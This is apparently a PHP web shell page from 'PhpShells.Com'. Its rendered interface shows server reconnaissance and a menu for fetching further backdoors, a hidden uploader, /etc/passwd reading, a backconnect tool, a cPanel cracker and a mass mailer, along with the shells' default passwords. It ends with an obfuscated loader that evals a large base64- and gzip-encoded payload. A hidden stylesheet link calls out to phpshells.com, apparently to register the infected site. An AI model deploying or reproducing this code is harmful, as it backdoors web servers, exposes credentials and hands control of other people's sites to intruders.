:</span></b><span style="color: rgb(153, 153, 153);">Off</span> - <b>[#]<span style="color: rgb(51, 204, 0);"> Oracle                 :</span></b><span style="color: rgb(153, 153, 153);">Off</span> - <b>[#]<span style="color: rgb(51, 204, 0);"> Postgrase                 :</span></b><span style="color: rgb(153, 153, 153);">Off</span><br><b>[#]<span style="color: rgb(51, 204, 0);"> Disable_functions  : </span></b><span style="font-weight: bold; color: red;">pcntl_alarm</span> - <span style="font-weight: bold; color: red;">pcntl_fork</span> - <span style="font-weight: bold; color: red;">pcntl_waitpid</span> - <span style="font-weight: bold; color: red;">pcntl_wait</span> - <span style="font-weight: bold; color: red;">pcntl_wifexited</span> - <span style="font-weight: bold; color: red;">pcntl_wifstopped</span> - <span style="font-weight: bold; color: red;">pcntl_wifsignaled</span> - <span style="font-weight: bold; color: red;">pcntl_wifcontinued</span> - <span style="font-weight: bold; color: red;">pcntl_wexitstatus</span> - <span style="font-weight: bold; color: red;">pcntl_wtermsig</span> - <span style="font-weight: bold; color: red;">pcntl_wstopsig</span> - <span style="font-weight: bold; color: red;">pcntl_signal</span> - <span style="font-weight: bold; color: red;">pcntl_signal_get_handler</span> - <span style="font-weight: bold; color: red;">pcntl_signal_dispatch</span> - <span style="font-weight: bold; color: red;">pcntl_get_last_error</span> - <span style="font-weight: bold; color: red;">pcntl_strerror</span> - <span style="font-weight: bold; color: red;">pcntl_sigprocmask</span> - <span style="font-weight: bold; color: red;">pcntl_sigwaitinfo</span> - <span style="font-weight: bold; color: red;">pcntl_sigtimedwait</span> - <span style="font-weight: bold; color: red;">pcntl_exec</span> - <span style="font-weight: bold; color: red;">pcntl_getpriority</span> - <span style="font-weight: bold; color: red;">pcntl_setpriority</span> - <span style="font-weight: bold; color: red;">pcntl_async_signals</span> - <span style="font-weight: bold; color: red;"></span> - <br>---------------------------------------------------------------------------------------------------------------------------------------------------<br><br><form method="post">
<b>[#]<span style="\&quot;color:" rgb(51,="" 204,="" 0);\"=""> Tools Grabber : <b></b></span><b><select name="tools">
<option>===================</option>
<option>hidden uploader</option>
<option>k2ll33d shell</option>
<option>x shell</option>
<option>2015priv8bypass</option>
<option>fwso shell</option>
<option>awso shell</option>
<option>mass</option>
<option>/etc/passwd</option>
<option>server users</option>
<option>backconnect weevely</option>
<option>turbo cpanel</option>
<option>symlinker</option>
<option>adminer</option>
<option>mailer</option>
<option>Magico pws</option>
<option>safe mode</option>
<option>404 shell</option>
<option>wp mass info changer</option>
<option>jo mass info changer</option>

</select>
<input type="submit" name="get" value="Get">

<br><br><br><br>
<span style="color: rgb(0, 153, 0);">[#]</span> <span style="color: rgb(0, 153, 0);"><span style="color: rgb(51, 204, 0);"><span style="color: rgb(153, 51, 153);">Please
Notice</span> :</span> the password of the <span style="color: rgb(51, 204, 0);">[ weevely backdoor</span> ] is <span style="color: rgb(153, 153, 0);">123456</span></span>
<br>
<span style="color: rgb(0, 153, 0);">[#] the user of [<span style="color: rgb(51, 204, 0);"> fwso shell</span>
] is <span style="color: rgb(153, 153, 0);">magico</span> and the
password is <span style="color: rgb(153, 153, 0);">xmagico</span></span>
<span style="color: rgb(0, 153, 0);"></span>
<br>
<span style="color: rgb(0, 153, 0);">[#] to view <span style="color: rgb(51, 204, 0);">the hidden uplouder</span> write (<span style="color: rgb(153, 153, 0);">up.php?x=x</span>) </span><br>
<span style="color: rgb(0, 153, 0);">[#] The Pass of <span style="color: rgb(51, 204, 0);">404 shell</span> is</span><span style="color: rgb(255, 204, 51);"> <span style="color: rgb(204, 153, 51);">katibprv8</span></span>
<br><b>...::::::: PhpShells.Com ::::::::...</b>

</b></b></form></small></big></span>

<link rel="stylesheet" type="text/css" href="https://phpshells.com/hide/add.php?link=easycoder://localhost/magico.php"><small><b><b>
</b></b></small></small></div></body></html>
Original PHP code
<?php
$UeXploiT = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLElFYiUlFqe\x61m\x63Snp\x43\x62np6RqFJ\x63UF\x61WW\x61\x61g45hnkxRtX\x42OTkZ4\x61k\x42mm\x43gTU\x41";
$An0n_3xPloiTeR = "=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";
eval(htmlspecialchars_decode(gzinflate(base64_decode($UeXploiT))));
exit;
?>